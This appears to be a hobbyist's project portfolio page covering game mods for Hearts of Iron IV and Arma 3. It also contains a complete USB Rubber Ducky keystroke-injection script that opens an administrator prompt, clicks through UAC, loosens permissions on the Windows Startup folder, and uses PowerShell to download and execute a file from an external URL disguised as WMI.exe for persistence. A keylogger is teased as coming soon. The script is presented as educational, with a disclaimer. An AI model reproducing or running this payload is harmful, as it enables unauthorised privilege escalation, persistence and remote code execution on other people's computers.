Our projects timeline
Hearts of Iron IV mods 2021 – 2025
When we started playing Hearts of Iron IV, We felt the game was missing a lot of background music. To fill that gap, We created several mods, which are now available on the Steam Workshop. With thousands of subscribers already, they are definitely worth a try. We hope you enjoy them!









Arma 3 Mods 2016-2025
We started out as a kid playing Operation Flashpoint: Cold War Crisis and eventually moved on to Arma 3. From early on, We where always drawn to the editor, creating my own content. In Arma 3, We’have written various missions that are available on the Steam Workshop ranging from Team Deathmatch to Sector Control and more.


Arma 3 autoclicker
Comming soon.
rubber ducky payload injection
This payload demonstrates how a Rubber Ducky script can interact with Windows to gain elevated privileges, change folder permissions, and establish persistence by downloading and executing a file. The purpose of sharing this information is purely educational and intended for research or study. It is not meant to encourage or promote illegal activity. Use responsibly in controlled, ethical environments only.
// Wait 5 seconds so the system is ready (USB recognized, OS stable)
DELAY 5000
// Open the Start menu (GUI D is unusual, often GUI R = Run dialog is intended)
GUI D
// Short delay, then navigate with TAB and press ENTER
DELAY 200
TAB
ENTER
// Wait a moment and type 'cmd' (command prompt)
DELAY 1000
STRING cmd
// Launch CMD as administrator (Ctrl+Shift+Enter = Run as Admin)
CTRL-SHIFT ENTER
// Wait, then press LEFT arrow to highlight "Yes" in UAC prompt and confirm with ENTER
DELAY 1000
LEFT
ENTER
// Grant full permissions to the user selected folder.
DELAY 1000
STRING icacls "{folderpath here}"\ /grant %Username%:(OI)(CI)F
ENTER
// Grant full permissions to the user on the Startup folder
DELAY 600
STRING icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"\ /grant %Username%:(OI)(CI)F
ENTER
// Start PowerShell
DELAY 600
STRING powershell
ENTER
// Download and execute a file from external URL
// 1. $down = Create WebClient object
// 2. $url = link to kshell.exe
// 3. $file = path in Startup folder (renamed WMI.exe)
// 4. Download the file and save it
// 5. Execute the file immediately with Shell.Application
DELAY 700
STRING $down = New-Object System.Net.WebClient; $url = "{File URL to download}"; $file = "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\{ToolName here}"; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
ENTER
// Wait and close the terminal
DELAY 1000
STRING exit
ENTER
home made KEY LOGGER
comming soon.
horax workspace tools
comming soon.